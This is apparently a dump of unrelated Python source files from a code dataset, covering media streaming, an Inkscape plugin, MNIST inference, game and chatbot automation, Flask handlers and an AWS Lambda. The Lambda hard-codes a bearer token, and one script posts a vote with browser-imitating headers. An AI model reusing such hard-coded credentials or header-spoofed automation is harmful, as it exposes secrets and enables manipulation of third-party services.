[Event(event_dict) for event_dict in concert_response.values()]\n print('writing to csv')\n write_to_csv(harvey_event_list, 'harvey.csv')\n write_to_csv(concert_event_list, 'um_concert.csv')\n","sub_path":"SI507project5_code.py","file_name":"SI507project5_code.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"209277738","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/env python\nimport gi\ngi.require_version('Gst', '1.0')\nfrom gi.repository import GLib, Gst\nfrom json import loads\n\n\nclass BaseStreamer(object):\n def __init__(self, desc=None):\n if not Gst.is_initialized():\n if not Gst.init_check(None):\n raise BaseException\n self.config_name = ''\n self.playing = False\n self.pool = dict()\n self.pipeline = Gst.Pipeline()\n self.bus = self.pipeline.get_bus()\n self.bus.add_signal_watch()\n self.bus.connect('message::eos', self.on_eos)\n self.bus.connect('message::error', self.on_error)\n if desc:\n self._create_pipeline(desc)\n\n def _create_pipeline(self, desc):\n if isinstance(desc, str):\n desc = loads(desc)\n\n for (name, props) in desc.iteritems():\n etype = props.pop('type', 'audioresample')\n link_to = props.pop('link', None)\n caps = props.pop('caps', None)\n self.pool[name] = Gst.ElementFactory.make(etype, None)\n self.pipeline.add(self.pool[name])\n if caps:\n self.pool[name].set_property('caps', Gst.caps_from_string(caps))\n self.pool[name].link_to = link_to\n for (prop, val) in props.iteritems(): # set all the properties\n self.pool[name].set_property(prop, val)\n\n for elem in self.pool.itervalues():\n if elem.link_to:\n elem.link(self.pool[elem.link_to])\n\n def _destroy_pipeline(self):\n self.stop()\n for name in self.pool:\n with self.pool.pop(name) as elem:\n elem.unlink()\n self.pipeline.remove(elem)\n\n def set_config(self, desc):\n self._destroy_pipeline()\n self._create_pipeline(desc)\n\n def play(self):\n self.pipeline.set_state(Gst.State.NULL)\n self.pipeline.set_state(Gst.State.PLAYING)\n self.playing = True\n\n def stop(self):\n self.playing = False\n return self.pipeline.set_state(Gst.State.NULL)\n\n def state(self):\n return str(self.pipeline.get_state(0)[1]).split()[1]\n\n def on_eos(self, bus, msg):\n print('on_eos()')\n\n def on_error(self, bus, msg):\n print('on_error():', msg.parse_error())\n\n\n\n\nfrom gi.repository import GObject, Gst, Gtk\n# Needed for window.get_xid(), xvimagesink.set_window_handle(), respectively:\nfrom gi.repository import GdkX11, GstVideo\n\n# GObject.threads_init()\n# Gst.init(None)\n\nclass VideoPlayer(BaseStreamer):\n def __init__(self):\n super\n self.window = Gtk.Window()\n self.window.connect('destroy', self.stop)\n self.window.set_default_size(640, 480)\n\n self.drawingarea = Gtk.DrawingArea()\n self.window.add(self.drawingarea)\n\n # This is needed to make the video output in our DrawingArea:\n self.bus.enable_sync_message_emission()\n self.bus.connect('sync-message::element', self.on_sync_message)\n\n self.playbin = Gst.ElementFactory.make('playbin', None)\n self.pipeline.add(self.playbin)\n\n def show(self):\n self.window.show_all()\n # You need XID after window.show_all(). Don't get it in on_sync_message() because threading causes segfaults.\n self.xid = self.drawingarea.get_property('window').get_xid()\n self.window.fullscreen()\n\n def play(self, ):\n self.pipeline.set_state(Gst.State.NULL)\n self.pipeline.set_state(Gst.State.PLAYING)\n self.playing = True\n\n def stop(self, window=None):\n self.pipeline.set_state(Gst.State.NULL)\n self.playing = False\n #Gtk.main_quit()\n\n def set_config(self, cfg=''):\n self.playbin.set_property('uri', 'file://' + cfg)\n\n def state(self):\n return str(self.pipeline.get_state(0)[1]).split()[1]\n\n def on_sync_message(self, bus, msg):\n if msg.get_structure().get_name() == 'prepare-window-handle':\n print('prepare-window-handle')\n msg.src.set_window_handle(self.xid)\n\n def on_eos(self, bus, msg):\n print('on_eos(): seeking to start of video')\n self.pipeline.seek_simple(Gst.Format.TIME, Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT, 0)\n\n def on_error(self, bus, msg):\n print('on_error():', msg.parse_error())\n\n\n\n\nif __name__ == \"__main__\":\n description = '{\"src\": {\"multicast-iface\": \"eth0\", \"auto-multicast\": true, \"caps\": \"application/x-rtp,media=(string)audio,clock-rate=(int)48000,encoding-name=(string)X-GST-OPUS-DRAFT-SPITTKA-00\", \"type\": \"udpsrc\", \"port\": 3333, \"multicast-group\": \"224.1.1.1\"}, \"sink\": {\"device\": \"hw:0,0\", \"link\": \"dec\", \"type\": \"alsasink\"}, \"dec\": {\"link\": \"rtp\", \"type\": \"opusdec\", \"use-inband-fec\": false}, \"rtp\": {\"link\": \"jtr\", \"type\": \"rtpopusdepay\"}, \"jtr\": {\"link\": \"src\", \"latency\": 200, \"type\": \"rtpjitterbuffer\", \"do-retransmission\": true}}'\n sink = BaseStreamer(description)\n\n","sub_path":"helpers/streamer.py","file_name":"streamer.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"534157185","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport base64\nimport urllib2\nimport inkex\n\n\nclass UnsplashPlaceholder(inkex.Effect):\n def __init__(self):\n inkex.Effect.__init__(self)\n self.OptionParser.add_option('-W', '--width', action='store', type='string', dest='width',\n default='800', help='Set image width')\n self.OptionParser.add_option('-H', '--height', action='store', type='string', dest='height',\n default='680', help='Set image height')\n self.OptionParser.add_option('-C', '--category', action='store', type='string', dest='category',\n default='', help='Set image category')\n\n def effect(self):\n image = self._get_image()\n node = self._create_image_node(image)\n\n self.document.getroot().append(node)\n\n def _get_image(self):\n url = 'https://lorempixel.com/{width}/{height}/{category}'.format(\n width=self.options.width,\n height=self.options.height,\n category=self.options.category\n )\n response = urllib2.urlopen(url)\n data = response.read()\n return data\n\n def _create_image_node(self, data):\n attribs = {\n 'height': self.options.height,\n 'width': self.options.width,\n 'category': self.options.category,\n 'x': '0',\n 'y': '0',\n 'preserveAspectRatio': 'None',\n inkex.addNS('href', 'xlink'): u'data:image/jpeg;base64,' + base64.encodestring(data)\n }\n node = inkex.etree.Element(inkex.addNS('image','svg'), attribs)\n return node\n\n\nif __name__ == '__main__':\n placeholder = UnsplashPlaceholder()\n placeholder.affect()\n","sub_path":"lorempixel.py","file_name":"lorempixel.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"130929434","text":"# -*- coding: utf-8 -*-\r\nimport struct\r\nfrom PIL import Image\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport datetime\r\nimport os\r\nfrom inference_images import inference_images\r\nfrom inference_labels import inference_labels\r\n\r\n#train_epoch:2 accuracy:0.4951\r\nif __name__ == \"__main__\":\r\n\tprint(\"Begin inference!\")\r\n\t#base_path = \"/home/mnist_dataset\"\r\n\tbase_path = os.getcwd()\r\n\tbase_inference_path = os.path.join(base_path,\"test_data\")\r\n\tinference_image_path = os.path.join(base_inference_path,\"t10k-images-idx3-ubyte\")\r\n\tinference_label_path = os.path.join(base_inference_path,\"t10k-labels-idx1-ubyte\")\r\n\tinference_labels = inference_labels(inference_label_path)\r\n\tinference_images = inference_images(inference_image_path)\r\n\tinput_image_size = int(inference_images.get_row_number())*int(inference_images.get_column_number())\r\n\tright_count = 0\r\n\tbatchsize = 1\r\n\twith tf.Session() as sess:\r\n\t\tsaver = tf.train.import_meta_graph(os.path.join(base_path,\"train_data/checkPoint/trainModel.meta\"))\r\n\t\tsaver.restore(sess, tf.train.latest_checkpoint(os.path.join(base_path,\"train_data/checkPoint\")))\r\n\r\n\t\titerations = inference_images.get_images_number()/batchsize\r\n\t\tfor step in range(iterations):\r\n\t\t\tlabel_vals = inference_labels.read_labels(batchsize)\r\n\t\t\tinference_image_pixs = inference_images.read_images(batchsize)\r\n\t\t\tinference_y_label = []\r\n\t\t\tfor item in label_vals:\r\n\t\t\t\tinference_sub_y_label = []\r\n\t\t\t\tfor i in range(10):\r\n\t\t\t\t\tif item != i:\r\n\t\t\t\t\t\tinference_sub_y_label.append(0)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tinference_sub_y_label.append(1)\r\n\t\t\t\t\tinference_y_label.append(inference_sub_y_label)\r\n\t\t\tinference_x = np.array(inference_image_pixs,dtype=np.float32)\r\n\t\t\tinference_y = np.array(inference_y_label,dtype=np.float32)\r\n\t\t\t# 获取需要进行计算的operator\r\n\t\t\tYs = sess.graph.get_tensor_by_name('Ys:0')\r\n\t\t\tX = sess.graph.get_tensor_by_name('X:0')\r\n\t\t\tY_ = sess.graph.get_tensor_by_name('Y_:0')\r\n\t\t\tresults = sess.run(Ys,feed_dict={X:inference_x, Y_:inference_y})\r\n\t\t\tfor image_number in range(batchsize):\r\n\t\t\t\tmaxindex = np.argmax(results[image_number])\r\n\t\t\t\ttrue_label = np.argmax(inference_y[image_number])\r\n\t\t\t\tif maxindex == true_label:\r\n\t\t\t\t\tright_count = right_count + 1\r\n\r\n\t\tprint(\"right_count is:{}\".format(right_count))\r\n\t\tprint(\"total dataset is:{}\".format(inference_images.get_images_number()))\r\n\t\tprint(\"accuracy is:{}\".format(float(right_count)/inference_images.get_images_number()))\r\n\r\n\t\t# maxindex = np.argmax(sess.run(op,feed_dict={X:inference_x, Y_:inference_y}))\r\n\t\t# print maxindex \r\n\t\t# print np.argmax(inference_y[0])","sub_path":"mnist/mnist_FC/mnist_inference.py","file_name":"mnist_inference.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408030434","text":"#! /usr/bin/python\n\nimport httplib,urllib\n\nparams = urllib.urlencode({\"question_2755\" : \"10493\"})\n\nheaders = {\"Origin\":\"http://cgi.mmog.163.com:8088\",\n \"Accept-Encoding\":\"gzip,deflate,sdch\",\n \"Accept-Language\":\"en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4\",\n \"User-Agent\":\"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\",\n \"Content-Type\":\"application/x-www-form-urlencoded\",\n \"Accept\":\"application/json, text/javascript, */*\",\n \"Referer\":\"http://cgi.mmog.163.com:8088/v4a/show_vote/1106/?6\",\n \"X-Requested-With\":\"XMLHttpRequest\",\n \"Connection\":\"keep-alive\"}\n\n\nconn = httplib.HTTPConnection(\"cgi.mmog.163.com:8088\")\n\nconn.request(\"POST\", \"/v4a/show_vote/1106/\", params, headers)\n\nresponse = conn.getresponse()\n\nprint(response.status, response.reason)\n\ndata = response.read()\nfh = open('rece.html', 'w')\nfh.write(data)\nfh.close()\n\nconn.close()\n","sub_path":"http/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202565482","text":"def count(arr,x):\r\n\tcount = 0\r\n\tfor y in arr:\r\n\t\tif x==y:\r\n\t\t\tcount+=1\r\n\treturn count\r\n\r\ndef greatest(arr,strings):\r\n\tmaxVal = -1\r\n\tmaxIndex = -1\r\n\tfor i in range(len(arr)):\r\n\t\tif arr[i]>maxVal:\r\n\t\t\tmaxVal = arr[i]\r\n\t\t\tmaxIndex = i\r\n\t\telif(arr[i]==maxVal):\r\n\t\t\tif(len(strings[i]) 0:\n # 有命中,进一步判断 confidence 是否达到要求\n confidence = respond[0][\"confidence\"]\n if confidence >= self.threshold:\n # 命中该问题,返回回答\n answer = respond[0][\"answer\"]\n if utils.validjson(answer):\n answer = random.choice(json.loads(answer))\n logger.info(\"{} 回答:{}\".format(self.SLUG, answer))\n return answer\n # 没有命中,走兜底\n if self.secondary != \"null\" and self.secondary is not None:\n try:\n ai = get_robot_by_slug(self.secondary)\n return ai.chat(texts, parsed)\n except Exception:\n logger.critical(\n \"Secondary robot {} failed to response for {}\".format(\n self.secondary, msg\n )\n )\n return get_unknown_response()\n else:\n return get_unknown_response()\n except Exception:\n logger.critical(\"AnyQ robot failed to response for %r\", msg, exc_info=True)\n return \"抱歉, 我的大脑短路了,请稍后再试试.\"\n\n\nclass OPENAIRobot(AbstractRobot):\n\n SLUG = \"openai\"\n\n def __init__(self, openai_api_key,model, temperature, max_tokens,top_p,frequency_penalty,presence_penalty,stop_ai):\n \"\"\"\n OpenAI机器人\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n \"\"\"\n super(self.__class__, self).__init__()\n self.openai_api_key = openai_api_key\n openai.api_key=self.openai_api_key\n logger.info(self.openai_api_key)\n self.model = model\n self.temperature = temperature\n self.max_tokens = max_tokens\n self.top_p = top_p\n self.frequency_penalty = frequency_penalty\n self.presence_penalty = presence_penalty\n self.stop_ai = stop_ai\n\n @classmethod\n def get_config(cls):\n # Try to get anyq config from config\n return config.get(\"openai\", {})\n\n def chat(self, texts, parsed):\n \"\"\"\n 使用OpenAI机器人聊天\n\n Arguments:\n texts -- user input, typically speech, to be parsed by a module\n \"\"\"\n msg = \"\".join(texts)\n msg = utils.stripPunctuation(msg)\n try:\n response = openai.Completion.create(\n model=self.model,\n prompt=msg,\n temperature=self.temperature,\n max_tokens=self.max_tokens,\n top_p=self.top_p,\n frequency_penalty=self.frequency_penalty,\n presence_penalty=self.presence_penalty,\n stop=self.stop_ai\n )\n logger.debug(response)\n logger.debug(response.choices[0].text)\n respond=response.choices[0].text\n logger.info(\"openai response: {}\".format(respond))\n return respond\n \n except Exception:\n logger.critical(\"openai robot failed to response for %r\", msg, exc_info=True)\n return \"抱歉, 我的大脑短路了,请稍后再试试.\"\n\n\ndef get_unknown_response():\n \"\"\"\n 不知道怎么回答的情况下的答复\n\n :returns: 表示不知道的答复\n \"\"\"\n results = [\"抱歉,我不会这个呢\", \"我不会这个呢\", \"我还不会这个呢\", \"我还没学会这个呢\", \"对不起,你说的这���,我还不会\"]\n return random.choice(results)\n\n\ndef get_robot_by_slug(slug):\n \"\"\"\n Returns:\n A robot implementation available on the current platform\n \"\"\"\n if not slug or type(slug) is not str:\n raise TypeError(\"Invalid slug '%s'\", slug)\n\n selected_robots = list(\n filter(\n lambda robot: hasattr(robot, \"SLUG\") and robot.SLUG == slug, get_robots()\n )\n )\n if len(selected_robots) == 0:\n raise ValueError(\"No robot found for slug '%s'\" % slug)\n else:\n if len(selected_robots) > 1:\n logger.warning(\n \"WARNING: Multiple robots found for slug '%s'. \"\n + \"This is most certainly a bug.\" % slug\n )\n robot = selected_robots[0]\n logger.info(\"使用 {} 对话机器人\".format(robot.SLUG))\n return robot.get_instance()\n\n\ndef get_robots():\n def get_subclasses(cls):\n subclasses = set()\n for subclass in cls.__subclasses__():\n subclasses.add(subclass)\n subclasses.update(get_subclasses(subclass))\n return subclasses\n\n return [\n robot\n for robot in list(get_subclasses(AbstractRobot))\n if hasattr(robot, \"SLUG\") and robot.SLUG\n ]\n","sub_path":"robot/AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":9199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445914381","text":"from os import listdir, makedirs\nfrom os.path import isfile, join\nfrom pathlib import Path\nfrom pprint import pprint\nfrom time import sleep\n\nfrom requests import post\n\nfrom utils import to_color\n\n\nclass Team():\n def __init__(self, token, team_id):\n self.token = token\n self.id = None\n self.cookies = None\n self.owner = None\n self.compos = None\n self.path = 'https://leekwars.com/api/'\n self.team_getPrivate(team_id)\n\n def team_getPrivate(self, team_id):\n '''\n compos = r.json()[\"team\"][\"compositions\"] \n team_fights = compo[\"leeks\"][0][\"team_fights\"]\n '''\n res = post(self.path + 'team/get-private/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"team_id\": team_id}).json()\n for leek in res[\"members\"]:\n if leek[\"grade\"] == 'owner':\n self.owner = leek[\"name\"] # or leek[\"id\"]\n break\n self.compos = res[\"compositions\"]\n\n def team_registerTournaments(self):\n for compo in self.compos:\n res = self.__team_registerTournament(compo[\"id\"])\n if \"error\" in res:\n print(\"Can't register ({}): {}\".format(compo[\"name\"], res[\"error\"]))\n else:\n print(\"Successfully registered ({}).\".format(compo[\"name\"]))\n\n def __team_registerTournament(self, composition_id):\n return post(self.path + 'team/register-tournament/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"composition_id\": composition_id}).json()\n\n def __garden_getCompositionOpponents(self, composition):\n r = post(self.path + 'garden/get-composition-opponents/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"composition\": composition})\n self.cookies = r.cookies\n return r.json()\n \n def __garden_startTeamFight(self, composition_id, target_id):\n return post(self.path + 'garden/start-team-fight/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"composition_id\": composition_id, \"target_id\": target_id},\n cookies=self.cookies).json()\n\n def __fight_get(self, fight_id):\n return post(self.path + 'fight/get/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"fight_id\": fight_id},\n cookies=self.cookies).json()\n \n def wait_fight_result(self, fight_id):\n \"\"\"Wait the result of a fight.\n\n Args:\n fight_id (int): The id of the fight to wait\n \"\"\"\n nbr_wait = 0\n while True:\n res = self.__fight_get(fight_id)\n fight = res['fight']\n winner = fight['winner']\n if winner == -1: # Fight isn't resolved yet\n print(\"Waiting (\"+ str(1 + nbr_wait * 2) + \"s) .\" + \".\" * nbr_wait, end=\"\\r\", flush=True)\n nbr_wait += 1\n sleep(2)\n continue\n elif winner >= 0:\n WARNING = '\\033[93m'\n OKGREEN = '\\033[92m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n win = \"WTF?\"\n if winner == 0:\n win = to_color(\"DRAW\", None, True)\n #win = WARNING + \"DRAW\" + ENDC\n elif winner == 1:\n win = to_color(\"WIN \", True, False)\n #win = OKGREEN + \"WIN \" + ENDC\n elif winner == 2:\n win = to_color(\"LOSE\", False, False)\n #win = FAIL + \"LOSE\" + ENDC\n\n team1_name = fight['report']['team1']['name']\n team1_talent = fight['report']['team1']['talent'] + fight['report']['team1']['talent_gain']\n team2_name = fight['report']['team2']['name']\n team2_talent = fight['report']['team2']['talent'] + fight['report']['team2']['talent_gain']\n\n print(\" \" * (nbr_wait + 15), end=\"\\r\", flush=True)\n print(\"Team {} {} ({}) vs {} ({})\".format(win, team1_name, team1_talent, team2_name, team2_talent), flush=True)\n return\n\n def startTeamFights(self):\n fightIds = []\n for compo in self.compos:\n team_fights = compo[\"leeks\"][0][\"team_fights\"]\n print(\"\")\n print(\"Team [{}], {} leeks, level {}, {} talent\".format(\n compo[\"name\"], len(compo[\"leeks\"]), compo[\"total_level\"], compo[\"talent\"]))\n print(\"team_fights\", team_fights)\n for _ in range(0, team_fights):\n res = self.__garden_getCompositionOpponents(compo[\"id\"])\n if res[\"opponents\"]:\n # TODO: Select best opponent\n #pprint(res[\"opponents\"])\n opponent = res[\"opponents\"][0]\n #print(\"Start team Fight vs '{}', level {}, {} talent\".format(opponent[\"name\"], opponent[\"total_level\"], opponent[\"talent\"]))\n res = self.__garden_startTeamFight(compo[\"id\"], opponent[\"id\"])\n fightIds.append(res['fight'])\n self.wait_fight_result(res['fight'])\n #break\n","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"73692326","text":"import unittest\nfrom Wpp.WppCore import WppCore\nfrom out.OutContextMemoryStream import OutContextMemoryStream\n\nclass TestWppInterface(unittest.TestCase):\n\tdef testExport(self):\n\t\tsource = \"\"\"\ninterface public A\ninterface public B\n\textends A\n\t\t\"\"\"\n\t\tmodule = WppCore.createMemModule(source, 'root.fake')\n\t\toutContext = OutContextMemoryStream()\n\t\tmodule.export(outContext)\n\t\tself.assertEqual(str(outContext), module.strPack(source))\n\n\tdef testInvalidParent(self):\n\t\tsource = \"\"\"\nclass public A\ninterface public B\n\textends A\n\t\t\"\"\"\n\t\twith self.assertRaises(RuntimeError) as cm:\n\t\t\tmodule = WppCore.createMemModule(source, 'root.fake')\n\t\tself.assertEqual(cm.exception.args[0], 'Invalid parent root.A:Class')\n","sub_path":"src1/Wpp/tests/testWppInterface.py","file_name":"testWppInterface.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170202640","text":"###########\n# Imports #\n###########\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom sqlalchemy.orm import sessionmaker\nfrom aa_run_first_database_setup import Base, Restaurant, User\nfrom flask import session as login_session\nimport json\nfrom sqlalchemy import create_engine\n\n###############\n# Setup Flask #\n###############\n\napp = Flask(__name__)\n\nCLIENT_ID = json.loads(\n open('z_client_test_services.json', 'r').read())['web']['client_id']\nAPPLICATION_NAME = \"Restaurant Menu Application\"\n\n# Connect to Database and create database session # small change\nengine = create_engine('sqlite:///restaurantmenuwithusers.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n##############################\n# Initial Required Functions #\n##############################\n\n# User Helper Functions\ndef create_user(login_session_):\n new_user = User(name=login_session_['username'], email=login_session_['email'], picture=login_session_['picture'])\n session.add(new_user)\n session.commit()\n user = session.query(User).filter_by(email=login_session_['email']).one()\n return user.id\n\n\ndef get_user_info(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef get_user_id(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\n###########\n# Library #\n###########\n\ndef edit_one_restaurant(restaurant_id):\n edit_restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n logged_in_user = login_session['username']\n\n if 'username' not in login_session:\n return redirect('/ohnommy/login')\n\n if edit_restaurant.user_id != login_session['user_id']:\n return (\"\")\n\n if request.method == 'POST':\n if request.form['name']:\n edit_restaurant.name = request.form['name']\n if request.form['cuisines']:\n edit_restaurant.rtype = request.form['cuisines']\n if request.form['style']:\n edit_restaurant.diningStyle = request.form['style']\n if request.form['contact']:\n edit_restaurant.contactNo = request.form['contact']\n if request.form['location']:\n edit_restaurant.location = request.form['location']\n if request.form['website']:\n edit_restaurant.website = request.form['website']\n if request.form['openHour']:\n edit_restaurant.openTime = request.form['openHour']\n if request.form['closedHour']:\n edit_restaurant.closeTime = request.form['closedHour']\n if request.form['bsHour']:\n edit_restaurant.bsHours = request.form['bsHour']\n if request.form['beHour']:\n edit_restaurant.beHours = request.form['beHour']\n if request.form['lsHour']:\n edit_restaurant.lsHours = request.form['lsHour']\n if request.form['leHour']:\n edit_restaurant.leHours = request.form['leHour']\n if request.form['dsHour']:\n edit_restaurant.dsHours = request.form['dsHour']\n if request.form['deHour']:\n edit_restaurant.deHours = request.form['deHour']\n if request.form['aboutrestaurant']:\n edit_restaurant.about = request.form['aboutrestaurant']\n session.commit()\n return redirect(url_for('show_restaurant_page', restaurant_id=restaurant_id))\n else:\n return render_template('edit-restaurant.html', loggedInUser=logged_in_user, restaurant_id=restaurant_id,\n editRestaurant=edit_restaurant)\n\n\ndef delete_one_restaurant(restaurant_id):\n delete_restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n if 'username' in login_session:\n logged_in_user = login_session['username']\n else:\n return redirect('/ohnommy/login')\n\n if delete_restaurant.user_id != login_session['user_id']:\n return (\"\")\n\n if request.method == 'POST':\n session.delete(delete_restaurant)\n session.commit()\n return redirect(url_for('opening_page'))\n else:\n return render_template('delete-restaurant.html', loggedInUser=logged_in_user, restaurant_id=restaurant_id,\n deleteRestaurant=delete_restaurant)\n","sub_path":"Oh_Nommy/directory/g_edit_and_delete_restaurant.py","file_name":"g_edit_and_delete_restaurant.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"122168164","text":"s=input(\"정수를 입력하세요 : \")\nl=s.split()#자동 리스트 작성\nl=[eval(i) for i in l]#list comprehension\nmax=0\nl.sort()\nfor i in range(0,l[-1]):\n if l.count(i)>=max:\n max=l.count(i)\n\nfor i in range(0,l[-1]):\n if l.count(i)==max:\n print(\"가장 많이 나온 숫자는 : {0}\".format(i))","sub_path":"untitled/14.2.py","file_name":"14.2.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"214746256","text":"import numpy as np\nimport random\nimport math\n\nMAX = 2147483647\n\n# mean-normalization\n# turn to [-1, 1]\n# returns\n# X, y matrix\n# rx, ry ranges\ndef meanNormalize(X, y):\n\trxmx = [-MAX for _ in range(len(X[0]))]\n\trxmn = [MAX for _ in range(len(X[0]))]\n\trymx = [-MAX]\n\trymn = [MAX]\n\tfor _ in X:\n\t\trxmx = [max(a, b) for a, b in zip(rxmx, _)]\n\t\trxmn = [min(a, b) for a, b in zip(rxmn, _)]\n\tfor _ in y:\n\t\trymx = [max(a, b) for a, b in zip(rymx, _)]\n\t\trymn = [min(a, b) for a, b in zip(rymn, _)]\n\n\trx = [[a, b] if b - a > 0.1 else [a - 0.1, b + 0.1] for a, b in zip(rxmn, rxmx)]\n\try = [rymn[0], rymx[0]] if rymx[0] - rymn[0] > 0.1 else [rymn[0] - 0.1, rymx[0] + 0.1]\n\n\tfor i in range(len(X)):\n\t\tX[i] = [(v - m[0]) / (m[1] - m[0]) * 2.0 - 1 for v, m in zip(X[i], rx)]\n\n\tfor i in range(len(y)):\n\t\ty[i] = (y[i][0] - ry[0]) / (ry[1] - ry[0]) * 2.0 - 1\n\treturn np.mat(X), np.mat(y).T, rx, ry\n\ndef gradient(X, y, theta):\n\tdiff = np.dot(X, theta) - y\n\treturn 1. / (X[0].size) * (np.transpose(X) * diff)\n\n# gradient descent\n# return theta\ndef gradientDescent(X, y):\n\ttimes = 5000\n\talpha = 0.2\n\ttheta = np.zeros([X[0].size, 1])\n\tprint(theta)\n\tfor _ in range(times):\n\t\tgrad = gradient(X, y, theta)\n\t\ttheta = theta - alpha * grad\n\treturn theta\n\n\ndef lr(X, y):\n\tm = len(X[0])\n\tX, y, rx, ry = meanNormalize(X, y)\n\ttheta = gradientDescent(X, y)\n\ttmp = np.copy(theta)\n\ttheta[0] = tmp[0] * (ry[1] - ry[0]) / (rx[0][1] - rx[0][0])\n\tfor i in range(1, m):\n\t\ttheta[i] = tmp[i] * (ry[1] - ry[0]) / (rx[i][1] - rx[i][0])\n\t\ttheta[0] = theta[0] - tmp[i] * rx[i][0] * (ry[1] - ry[0]) / (rx[i][1] - rx[i][0]) + ry[0]\n\treturn theta\n\nif __name__ == '__main__':\n print(\"hello world!\")","sub_path":"linerregression/liner.py","file_name":"liner.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435296264","text":"import json\nimport boto3\nimport decimal\nfrom botocore.vendored import requests as requests\nfrom uuid import uuid1\n\n\n# Helper class to convert a DynamoDB item to JSON.\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return int(o) if o % 1 == 0 else float(o)\n \n return super(DecimalEncoder, self).default(o)\n\n\ndef lambda_handler(event, context):\n \n task_id = event['pathParameters'].get('task_id')\n sofier = event['queryStringParameters'].get('sofier')\n \n status, data = set_start_execution(task_id, sofier)\n \n return {\n 'statusCode': status,\n 'body': json.dumps(data, cls=DecimalEncoder),\n 'headers': {\n 'Access-Control-Allow-Origin': '*' \n } \n }\n\nURL = 'https://mysofie.com/api/v2/micro_task/execution/{task_id}/start'\n\nHEADERS = {'Authorization': 'Bearer RVVfU09VX0FfTEVOREE='}\n\ndef set_start_execution(task_id: str, sofier: str) -> tuple:\n \"\"\"\n \n [X] - Recupera o nome da tarefa atrelada à tarefa\n [X] - Recupera o fluxo de execução da tarefa\n [X] - Sinaliza à Bússola o status da tarefa\n \"\"\"\n status, buffer = 500, None\n\n #: MARCA NA TABELA DE TAREFAS QUE A TAREFA ESTÁ EM EXECUÇÃO, RECUPERANDO AS VARIABLES\n response_task = boto3.resource('dynamodb').Table('table_micro_task_in_person').get_item(\n Key={'task_id': task_id},\n ProjectionExpression='task.#name, variables',\n ExpressionAttributeNames={'#name': 'name'}\n )\n\n #: RECUPERA O FLUXO DE EXECUÇÃO DA TAREFA\n response_flow = boto3.resource('dynamodb').Table('table_micro_task_flows').get_item(\n Key={'name': response_task['Item']['task']['name'], 'version': 1}\n )\n\n #: SINALIZA AO BACKEND LEGADO DE QUE A TAREFA FOI INICIADA\n response = requests.post(URL.format(task_id=task_id), headers=HEADERS, params={'sofier': sofier})\n if response.status_code != 200:\n return response.status_code, response.json()\n\n #: Formatando a resposta final\n status = 200\n response = {\n 'task_id': task_id,\n 'execution_id': str(uuid1()),\n 'task_flow': response_flow['Item']['task_flow'],\n 'variables': response_task['Item'].get('variables', dict()),\n 'task_info': {\n 'name': response_flow['Item']['name'],\n 'version': response_flow['Item']['version']\n }\n }\n \n return status, response","sub_path":"serverless_aws/LAMBDA FUNCTIONS/micro_task-start/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"70291784","text":"from DAO import *\nimport config as WebConfig \nimport xlsxwriter\nimport json\n\nclass Report:\n def DownloadReport(BiceId,FromDate,ToDate,path):\n response=DataAccess.DownloadReport(BiceId,FromDate,ToDate)\n print(path)\n FileName=Report.CeateExcel(response,path)\n return FileName\n def CeateExcel(data,path):\n filename=''\n col=['Candidate_Id', 'Salutation', 'First_Name', 'Middle_Name', 'Last_Name', 'Bice_Name', 'Door_No_Street', 'City_Name', 'State_Name', 'Country_Name', 'Pincode', 'Dob', 'Mobile_Number', 'Max_Edu', 